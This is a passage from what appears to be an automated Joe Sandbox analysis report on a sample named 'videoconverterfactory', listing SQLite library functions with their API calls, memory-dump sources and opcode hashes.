                                                                                                      • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
                                                                                                      • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
                                                                                                      • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
                                                                                                      • sqlite3_free.SQLITE3 ref: 6093A3BA
                                                                                                      • sqlite3_free.SQLITE3 ref: 6093A3C2
                                                                                                        • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                                        • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                                        • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                                        • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                                        • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
                                                                                                      • String ID:
                                                                                                      • API String ID: 1903298374-0
                                                                                                      • Opcode ID: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                                      • Instruction ID: f6c450fbbadf2e04ab128defb7df19fdb2a161b4e6cf4e71623f80625393026f
                                                                                                      • Opcode Fuzzy Hash: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                                      • Instruction Fuzzy Hash: EB513870A047218BDB58DF69C8C074AB7A6BF65318F05896CECA69B305D735EC41CF91
                                                                                                      APIs
                                                                                                        • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                                      • sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                                      • sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                                      • sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                                      • sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                                      • String ID:
                                                                                                      • API String ID: 1894464702-0
                                                                                                      • Opcode ID: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                                      • Instruction ID: 8ebadd1dc7ee404a0f141fd21885e91e0aa1156a5a6df10951b92a0b718128ce
                                                                                                      • Opcode Fuzzy Hash: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                                      • Instruction Fuzzy Hash: CF313C70B086118BDB18DF79C8C1A1A7BFBBFB2704F148468E8418B219EB35DC419F91
                                                                                                      APIs
                                                                                                        • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
                                                                                                      • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 609253C4
                                                                                                      • sqlite3_log.SQLITE3 ref: 609253E2
                                                                                                      • sqlite3_log.SQLITE3 ref: 60925406
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 60925443
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                                      • String ID:
                                                                                                      • API String ID: 3336957480-0
                                                                                                      • Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                                      • Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
                                                                                                      • Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                                      • Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
                                                                                                      APIs
                                                                                                      • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                                                                      • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                                                                      • sqlite3_data_count.SQLITE3 ref: 60961465
                                                                                                      • sqlite3_column_value.SQLITE3 ref: 60961476
                                                                                                      • sqlite3_result_value.SQLITE3 ref: 60961482
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3091402450-0
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 251237202-0
                                                                                                      APIs
                                                                                                      • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                                                                      • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                                                                      • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                                                                      • String ID:
                                                                                                      • API String ID: 4225432645-0
                                                                                                      APIs
                                                                                                      • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 6090359D
                                                                                                      • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 609035E0
                                                                                                      • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 609035F9
                                                                                                      • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 60903614
                                                                                                      • sqlite3_free.SQLITE3(?,-00000200,?), ref: 6090361C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 251237202-0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_log
                                                                                                      • String ID: ($string or blob too big$|
                                                                                                      • API String ID: 632333372-2398534278
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$Protect$Query
                                                                                                      • String ID: @
                                                                                                      • API String ID: 3618607426-2766056989
                                                                                                      APIs
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 60928353
                                                                                                        • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                                      • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                                                                      • sqlite3_free.SQLITE3 ref: 609283B6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                                      • String ID: d
                                                                                                      • API String ID: 211589378-2564639436
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                                                                      • API String ID: 1646373207-2713375476
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 2313487548-0
                                                                                                      • Opcode ID: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                                                                      • Instruction ID: 4e09bb13dd5a3c3c1d339de95b14bc5918580ae4e3dbdcf066e72e084d482625
                                                                                                      • Instruction Fuzzy Hash: 15E14674928209EFDB04CF94D184B9EBBB2FF69304F208558D8956B259D774EC86CF81
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: sqlite_master$sqlite_sequence$sqlite_temp_master
                                                                                                      • API String ID: 0-1177837799
                                                                                                      • Opcode ID: b45b6970ebe54efa46efcb65f0e1138f7cff2b55d537d73117a3441f01693427
                                                                                                      • Instruction ID: e5240d50caebec33bd4ce83d4b9fb982fe545a794019e3d400788b6e3ec19482
                                                                                                      • Instruction Fuzzy Hash: F7C13974B062089BDB05DF68D49179EBBF3AFA8308F14C42DE8899B345DB39D841CB41
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                                                                      • String ID:
                                                                                                      • API String ID: 1648232842-0
                                                                                                      • Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                                      • Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
                                                                                                      • Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
                                                                                                      APIs
                                                                                                      • sqlite3_step.SQLITE3 ref: 609614AB
                                                                                                      • sqlite3_reset.SQLITE3 ref: 609614BF
                                                                                                        • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                                        • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                                                                      • String ID:
                                                                                                      • API String ID: 3429445273-0
                                                                                                      • Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                                      • Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
                                                                                                      • Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_snprintf$sqlite3_stricmpsqlite3_value_text
                                                                                                      • String ID:
                                                                                                      • API String ID: 1035992805-0
                                                                                                      • Opcode ID: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                                                                      • Instruction ID: 84d28b158f1a11e063f70be148de9c7b2eff514b3bcf7808f17aa895500be78a
                                                                                                      • Instruction Fuzzy Hash: 8C3178B0A08324DFEB24CF28C481B4ABBF6FBA5318F04C499E4888B251C775D885DF42
                                                                                                      APIs
                                                                                                      • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
                                                                                                      • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
                                                                                                      • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
                                                                                                      • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                      • String ID:
                                                                                                      • API String ID: 1477753154-0
                                                                                                      • Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                                      • Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
                                                                                                      • Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
                                                                                                      APIs
                                                                                                      • sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                                        • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                                      • sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                                      • sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
                                                                                                      • String ID:
                                                                                                      • API String ID: 2673540737-0
                                                                                                      • Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                                      • Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
                                                                                                      • Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                                                      • String ID:
                                                                                                      • API String ID: 3526213481-0
                                                                                                      • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                                      • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                                                                      • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                                                                      APIs
                                                                                                      • sqlite3_prepare.SQLITE3 ref: 60969166
                                                                                                      • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                                                                        • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                                                                      • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                                                                        • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                                                                      • sqlite3_step.SQLITE3 ref: 60969197
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                                                                      • String ID:
                                                                                                      • API String ID: 2877408194-0
                                                                                                      • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                                      • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                                                                      • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                                                                      APIs
Similarity
• API ID: sqlite3_free, sqlite3_mprintf, sqlite3_value_blob, sqlite3_value_bytes
• String ID:
• API String ID: 1163609955-0
APIs
• sqlite3_prepare_v2.SQLITE3 ref: 609615BA
• sqlite3_step.SQLITE3 ref: 609615C9
• sqlite3_column_int.SQLITE3 ref: 609615E1
  • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
• sqlite3_finalize.SQLITE3 ref: 609615EE
Similarity
• API ID: sqlite3_column_int, sqlite3_finalize, sqlite3_prepare_v2, sqlite3_step, sqlite3_value_int
• String ID:
• API String ID: 4265739436-0
APIs
• sqlite3_mutex_enter.SQLITE3 ref: 609084E9
• sqlite3_mutex_leave.SQLITE3 ref: 60908518
• sqlite3_mutex_enter.SQLITE3 ref: 60908528
• sqlite3_mutex_leave.SQLITE3 ref: 6090855B
Similarity
• API ID: sqlite3_mutex_enter, sqlite3_mutex_leave
• String ID:
• API String ID: 1477753154-0
APIs
Strings
Similarity
• API ID: sqlite3_log
• String ID: into$out of
• API String ID: 632333372-1114767565
APIs
  • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
• sqlite3_free.SQLITE3 ref: 609193A3
Strings
Similarity
• API ID: sqlite3_free, sqlite3_value_text
• String ID: (NULL)$NULL
• API String ID: 2175239460-873412390
APIs
Strings
Similarity
• API ID: sqlite3_log
• String ID: -- $d
• API String ID: 632333372-777087308
APIs
Strings
Similarity
• API ID: sqlite3_log
• String ID: string or blob too big$|
• API String ID: 632333372-330586046
APIs
Strings
Similarity
• API ID: sqlite3_log
• String ID: d$|
• API String ID: 632333372-415524447
APIs
Strings
Similarity
• API ID: sqlite3_log, sqlite3_value_text
• String ID: string or blob too big
• API String ID: 2320820228-2803948771
APIs
• sqlite3_aggregate_context.SQLITE3 ref: 60914096
• sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
Strings
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                                      • String ID:
                                                                                                      • API String ID: 3265351223-3916222277
                                                                                                      • Opcode ID: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                                      • Instruction ID: a3c0f903ff645dd1c5a8146eaa2078e963ad6c1b8d1bbf61d5d4caeb1888773d
                                                                                                      • Opcode Fuzzy Hash: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                                      • Instruction Fuzzy Hash: 19119EB0A0C6589BDF059F69C4D539A7BF6AF39308F0044E8D8D08B205E771CD94CB81
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_stricmp
                                                                                                      • String ID: log
                                                                                                      • API String ID: 912767213-2403297477
                                                                                                      • Opcode ID: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                                      • Instruction ID: cbf508da25866b0a35bc2ca480d64d7c482f0664b0359b741109bd545b4f9ff5
                                                                                                      • Opcode Fuzzy Hash: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                                      • Instruction Fuzzy Hash: FD11DAB07087048BE725AF66C49535EBBB3ABA1708F10C42CE4854B784C7BAC986DB42
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_strnicmp
                                                                                                      • String ID: SQLITE_
                                                                                                      • API String ID: 1961171630-787686576
                                                                                                      • Opcode ID: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                                      • Instruction ID: 6d5ef3c0fd507030b5e8170497320435726bf3f0db30f2d6f2734bcd7f756fb3
                                                                                                      • Opcode Fuzzy Hash: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                                      • Instruction Fuzzy Hash: 2501D6B190C3505FD7419F29CC8075BBFFAEBA5258F10486DE89687212D374DC81D781
                                                                                                      APIs
                                                                                                      • sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
                                                                                                      • sqlite3_value_blob.SQLITE3 ref: 6091A1FA
                                                                                                      Strings
                                                                                                      • Invalid argument to rtreedepth(), xrefs: 6091A1E3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_value_blobsqlite3_value_bytes
                                                                                                      • String ID: Invalid argument to rtreedepth()
                                                                                                      • API String ID: 1063208240-2843521569
                                                                                                      • Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                                      • Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
                                                                                                      • Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                                      • Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
                                                                                                      APIs
                                                                                                      • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                                                                        • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                                        • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                                        • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                                        • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
